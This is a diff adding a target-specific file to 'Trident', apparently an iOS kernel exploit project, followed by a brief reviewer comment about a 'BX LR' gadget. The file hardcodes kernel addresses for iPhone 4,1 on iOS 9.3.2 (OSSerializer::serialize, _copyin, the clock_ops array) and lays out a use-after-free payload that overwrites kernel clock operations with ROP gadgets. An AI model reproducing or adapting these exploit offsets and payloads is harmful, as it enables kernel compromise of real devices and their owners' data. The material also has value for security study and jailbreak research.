Trident/target_iphone_4_1_ios_9_3_2.c

```diff
@@ -0,0 +1,59 @@
+//
+//  target_iphone_4_1_ios_9_3_2.c
+//  Trident
+//
+//  Created by nanidayo on 15/12/2016.
+//  Copyright © 2016 Benjamin Randazzo. All rights reserved.
+//
+
+#include "target_iphone_4_1_ios_9_3_2.h"
+
+static uint8_t clock_ops_overwrite[] = {
+    0x65, 0x82, 0x31, 0x00, // [00] (rtclock.getattr): address of OSSerializer::serialize (+1)
+    0x00, 0x00, 0x00, 0x00, // [04] (calend_config): NULL
+    0x00, 0x00, 0x00, 0x00, // [08] (calend_init): NULL
+    0x71, 0xe1, 0x01, 0x00, // [0C] (calend_gettime): address of calend_gettime (+1)
+    0x49, 0x98, 0x0d, 0x00, // [10] (calend_getattr): address of _bufattr_cpx (+1)
+};
+
+static uint8_t uaf_payload_buffer[] = {
+    0x00, 0x00, 0x00, 0x00, // [00] ptr to clock_ops_overwrite buffer
+    0x28, 0x34, 0x40, 0x00, // [04] address of clock_ops array in kern memory
+    0xb4, 0x76, 0x0c, 0x00, // [08] address of _copyin
+    0x00, 0x00, 0x00, 0x00, // [0C] NULL
+    0x65, 0x82, 0x31, 0x00, // [10] address of OSSerializer::serialize (+1)
+    0x3a, 0x98, 0x0d, 0x00, // [14] address of "BX LR" code fragment
```

Comment:
Ah, that should really matter too much though, right? It's just a BX LR gadget.
![](https://puu.sh/sPBXN/ca35a20034.png)